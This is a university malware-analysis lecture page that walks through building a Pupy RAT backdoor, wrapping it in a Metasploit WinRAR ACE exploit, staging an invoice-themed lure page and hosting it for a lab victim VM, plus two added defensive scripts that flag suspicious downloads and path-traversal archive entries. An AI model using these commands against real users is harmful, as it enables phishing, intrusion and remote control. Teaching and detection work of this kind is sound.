CS6038/CS5138 Malware Analysis, UC

Course content for UC Malware Analysis

21 January 2020

Building Malware - Metasploit & Pupy RAT

by Coleman Kane

This lecture covered using Pupy RAT, Metasploit, and Kali to build malware for an attack.

Setting up Kali for Pupy RAT

The Pupy RAT tool is an open source Remote Access Tool that was reportedly used in an attack against Saudi Arabian targets in 2017. The tool has extensive capabilities, and its integrated Python scripting makes it easy for an adversary to extend and automate.

You can visit the project's GitHub page at https://github.com/n1nj4sec/pupy to learn more.

To replay the steps I used in the lecture, you can open up Kali, then bring up a terminal, and run the following commands which are documented in Pupy RAT’s install instructions.

apt-get install git libssl1.0-dev libffi-dev python-dev \
	python-pip build-essential swig tcpdump python-virtualenv
mkdir -p ~/tools/
cd ~/tools/
git clone --recursive https://github.com/n1nj4sec/pupy
cd pupy
python create-workspace.py -DG pupyw
# ... wait for some time ...

Once complete, run the pupysh command from inside of ~/tools/pupy/pupyw to start the Pupy RAT shell.

Staging Additional Components for the Attack

Additionally, I want to pull down a copy of the WinRAR 5.61 installer, because in this scenario the user is tricked into installing this version onto the Win 7 VM.

wget -O ~/tools/pupy/pupyw/wrar561.exe https://www.rarlab.com/rar/wrar561.exe

Finally, I demonstrated an example HTML file intended to look like a message telling the target to install this package in order to view an invoice. The content of that HTML file is below; the following command writes it to ~/tools/pupy/pupyw/index.html.

cat > ~/tools/pupy/pupyw/index.html << END
<p>Below is the invoice you've requested</p>
<p>Please use <a href="wrar561.exe">this tool</a> to view it, and get back to us.</p>
<p><a href="invoice.pdf.ace">invoice.pdf</a></p>
END

Generate the Pupy RAT Backdoor

Once I have done all of the above, I switch the Kali VM's network adapter from NAT over to Host-only networking. Once complete, I load Pupy RAT using the pupysh command described above. To generate the malware EXE, I run the following command from within the shell, which creates the new file invoice.exe in the ~/tools/pupy/pupyw directory.

gen -A x86 -O windows -f client -o invoice.exe -D .

Build the Exploit With Metasploit

Leave pupysh running and open a new terminal for Metasploit. Start the Metasploit console and, once it has finished loading, run the following commands to package invoice.exe into an ACE archive exploit:

use exploit/windows/fileformat/winrar_ace
set CUSTFILE invoice.exe
set FILENAME invoice.pdf.ace
set payload generic/custom
exploit

Once you run the exploit command, a new ACE archive will be written to ~/.msf4/local/invoice.pdf.ace. You will want to use another shell to copy this into the pupyw staging directory:

cp ~/.msf4/local/invoice.pdf.ace ~/tools/pupy/pupyw

Hosting the Attack for Delivery

Finally, from inside the ~/tools/pupy/pupyw staging directory, we used Python's SimpleHTTPServer module to serve all of this on port 80, so the victim VM can be directed to it:

# Python 2 module; the Python 3 equivalent is: python3 -m http.server 80
python -m SimpleHTTPServer 80
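From the defender's side, this delivery chain leaves a recognisable trace in web access logs: a page fetch, then an executable download, then a double-extension archive, all from the same client. The following Python script is an added example, not part of the lecture and not code from Pupy or Metasploit. The log lines it parses are constructed to mimic the one-line-per-request format SimpleHTTPServer prints, and the extension lists are my own assumptions about what a proxy or IDS rule should flag.

```python
import re

# Constructed sample lines in the shape SimpleHTTPServer prints to stderr
# (client, timestamp, request line, status). Not a real capture.
SAMPLE_LOG = """\
192.168.56.101 - - [21/Jan/2020 10:15:01] "GET /index.html HTTP/1.1" 200 -
192.168.56.101 - - [21/Jan/2020 10:15:09] "GET /wrar561.exe HTTP/1.1" 200 -
192.168.56.101 - - [21/Jan/2020 10:16:40] "GET /invoice.pdf.ace HTTP/1.1" 200 -
192.168.56.101 - - [21/Jan/2020 10:16:41] "GET /favicon.ico HTTP/1.1" 404 -
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed lists: types a browser hands straight to the OS or an archiver,
# and document types an attacker stacks a risky extension behind.
RISKY_EXT = {".exe", ".ace", ".rar", ".zip", ".js", ".vbs", ".scr", ".msi", ".hta"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def extensions(path):
    """Lower-cased extension chain of a URL path, e.g. ['.pdf', '.ace']."""
    name = path.rsplit("/", 1)[-1].split("?", 1)[0].lower()
    parts = name.split(".")
    return ["." + p for p in parts[1:]]


def classify_request(path):
    """Return a list of reasons the request is suspicious, or None."""
    exts = extensions(path)
    if not exts:
        return None
    reasons = []
    if exts[-1] in RISKY_EXT:
        reasons.append("executable-or-archive download")
    if len(exts) >= 2 and exts[-2] in DOC_EXT and exts[-1] in RISKY_EXT:
        reasons.append("double extension masquerading as %s" % exts[-2])
    return reasons or None


def scan_access_log(text):
    """Yield (client, path, reasons) for successfully served suspicious files."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("status") != "200":
            continue
        reasons = classify_request(m.group("path"))
        if reasons:
            findings.append((m.group("client"), m.group("path"), reasons))
    return findings


def delivery_chains(findings):
    """Group flagged downloads by client so the lure -> tool -> archive sequence is visible."""
    chains = {}
    for client, path, _ in findings:
        chains.setdefault(client, []).append(path)
    return chains


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for client, path, reasons in hits:
        print("%s %s: %s" % (client, path, "; ".join(reasons)))
    print(delivery_chains(hits))
```

Only 200 responses are counted, so a 404 for a probe does not create noise; the per-client grouping is what turns two individually weak signals (an installer download, an odd extension) into a sequence worth a closer look.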

Exploiting the Victim

Next we configure the Windows VM with Host-only Networking on the same virtual interface as the Kali VM. In Internet Explorer we visit the page and follow the directions and hyperlinks: install WinRAR, then save and extract the ACE archive. WinRAR writes the malware into the user's Startup folder, so it starts the next time the user reboots the system. This has the added benefit of minimizing the behavior that will automatically run inside an automated sandbox, while still being relatively reliable: the user is likely to log out or reboot their workstation sometime within the next week.
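What lets the payload land in the Startup folder rather than the extraction directory is an archiver trusting the path stored in an entry. The following Python script is an added example, not from the lecture, WinRAR or Metasploit, of the check an extractor or a triage tool should run on entry names before writing anything: it resolves each name against the extraction directory using ntpath (so it runs on any host) and flags names that escape that directory, that are absolute or UNC paths, or that land in either of the two Windows Startup folders. The entry names are constructed for illustration, and the extraction directory and extension list are assumptions.

```python
import ntpath

# Constructed entry names modelled on an archive listing; not from a real archive.
SAMPLE_ENTRIES = [
    "invoice.pdf",
    "docs\\readme.txt",
    "..\\..\\..\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows"
    "\\Start Menu\\Programs\\Startup\\invoice.exe",
    "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\update.exe",
    "\\\\server\\share\\tool.exe",
]

# Assumed extraction directory for the example.
EXTRACT_DIR = "C:\\Users\\victim\\Downloads"

# Both the per-user (%APPDATA%) and all-users (%ProgramData%) Startup folders
# end with this path fragment; compared case-insensitively.
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

# Assumed list of extensions Windows will execute or that load code on login.
EXEC_EXT = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".lnk"}


def resolve(extract_dir, entry):
    """Where the entry would be written if the archiver trusted its name verbatim."""
    return ntpath.normpath(ntpath.join(extract_dir, entry))


def classify_entry(extract_dir, entry):
    """Return the list of reasons an entry name is unsafe to extract (empty if fine)."""
    reasons = []
    target = resolve(extract_dir, entry)

    # Absolute paths and UNC paths override the extraction directory entirely.
    drive, _ = ntpath.splitdrive(entry)
    if drive or entry.startswith(("\\", "/")):
        reasons.append("absolute or UNC path")

    # ".." components resolve to somewhere outside the directory the user chose.
    root = ntpath.normpath(extract_dir).lower().rstrip("\\") + "\\"
    if not target.lower().startswith(root):
        reasons.append("escapes extraction directory")

    # Anything placed here runs at the next interactive logon.
    if STARTUP_MARKER in target.lower():
        reasons.append("writes into a Startup folder")

    # An executable that also escapes is the persistence pattern described above.
    if reasons and ntpath.splitext(target)[1].lower() in EXEC_EXT:
        reasons.append("payload is executable")
    return reasons


def scan_entries(extract_dir, entries):
    """Map each unsafe entry name to its reasons; safe entries are omitted."""
    return {e: classify_entry(extract_dir, e) for e in entries if classify_entry(extract_dir, e)}


if __name__ == "__main__":
    for entry, reasons in scan_entries(EXTRACT_DIR, SAMPLE_ENTRIES).items():
        print("%s\n    -> %s\n    %s" % (entry, resolve(EXTRACT_DIR, entry), "; ".join(reasons)))
```

The same logic applies to any archive format: the safe rule for an extractor is to refuse (or rewrite to a basename) every entry whose resolved path is not under the chosen directory, and a triage analyst listing an archive can use the Startup-folder match as a direct indicator of the persistence technique this lecture demonstrates.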

Once the user is logged back in after a reboot or sign-out, the malware will connect to the Pupy RAT shell, and we can use all of the commands and modules therein to explore the victim VM. Note that this attack would likely work on a Windows 10 system as well, though some behaviors might be identified as suspicious if Windows Defender is enabled.


tags: malware - lecture